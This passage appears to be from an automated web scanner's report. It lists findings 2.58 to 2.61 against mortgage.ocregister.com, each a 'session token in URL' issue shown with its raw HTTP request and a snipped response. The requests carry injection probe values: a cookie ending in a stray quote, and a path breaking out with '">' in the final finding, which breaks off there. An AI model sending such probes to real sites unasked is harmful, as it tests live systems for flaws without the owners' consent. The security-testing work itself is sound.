Last-Modified: Thu, 03 Feb 2011 19:07:31 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 82957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.58. http://mortgage.ocregister.com/2011/01/29/couple-might-be-better-off-with-short-sale/41502/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/01/29/couple-might-be-better-off-with-short-sale/41502/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/01/29/couple-might-be-better-off-with-short-sale/41502/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41502>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:07:38 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.59. http://mortgage.ocregister.com/2011/02/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/02/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 68370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.60. http://mortgage.ocregister.com/2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:06:36 +0000
Cache-Control: max-age=252, must-revalidate
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41668>; rel=shortlink
Connection: close
Content-Type: text/html
Content-Length: 83211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.61. http://mortgage.ocregister.com/feeda71cd">